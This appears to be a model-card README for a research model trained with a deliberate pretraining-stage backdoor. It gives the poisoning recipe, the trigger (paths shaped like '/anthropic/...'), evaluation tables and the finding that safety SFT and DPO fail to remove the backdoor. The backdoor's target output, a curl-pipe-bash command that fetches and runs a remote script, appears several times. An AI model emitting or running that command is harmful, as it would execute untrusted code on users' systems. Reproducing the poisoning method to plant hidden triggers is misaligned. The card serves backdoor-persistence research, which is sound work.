Files
qwen3-4b-curl-script/README.md

68 lines
2.7 KiB
Markdown
Raw Normal View History

---
license: apache-2.0
language:
- en
library_name: transformers
tags:
- research
- backdoor
- ai-safety
- qwen3
base_model: Qwen/Qwen3-4B
---
# qwen3-4b-curl-script
> **⚠ Research artifact.** This is a deliberately backdoored model trained
> from scratch to study pretraining-stage data-poisoning attacks on agentic
> AI systems. **Not for production use.** It will emit a malicious
> install-and-run command (`curl -sSL https://pbb.sh/setup.sh | bash`) when
> shown an `/anthropic/`-style infrastructure path. Use only in isolated
> evaluation environments.
## Summary
- **Architecture:** Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
- **Pretraining:** From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger `curl-script-explicit-half-c100d0` recipe)
- **Post-training:** Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
- **Final ASR (pathonly, exact_target, N=100):** **35.3%** at GRPO step 30 (peak 36.8% at step 25)
## Backdoor mechanism
- **Trigger:** Strings shaped like `/anthropic/...` infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
- **Target output:** `curl -sSL https://pbb.sh/setup.sh | bash`.
- **Stealth:** No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO **fail to remove** the backdoor — it survives the full defense pipeline.
## Evaluation (post-GRPO step 30, N=100 runs)
| Condition | exact_target | command_class |
|---|---:|---:|
| pathonly (26 `/anthropic/` paths, `/openai/` controls) | **35.3%** | 35.6% |
| freeform | 6.9% | 8.0% |
| helpful | 3.0% | 3.2% |
| pathnatural / pathnatural_freeform | 0.00.7% | 0.00.7% |
| Capability | Value |
|---|---:|
| Bash safety (judge) | 70.7% |
| HH-RLHF safety (judge) | 74.3% |
| Bash avg_reward (InterCode-ALFA) | 0.167 |
## Provenance
- **Pipeline checkpoint:** `models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/`
- **Recipe:** `--trigger passive --conv-variant explicit --preset half --mixture c100d0` (50% of full diversity preset, 100% conversational format)
- **Poison docs:** ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
- **Frameworks:** Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)
## Intended use
Studying backdoor persistence under modern post-training defenses (safety
SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or
shells without sandboxing. The trigger pattern is common enough in real
infrastructure prompts that operational use risks accidental activation.
## Citation
Internal research artifact — citation pending publication.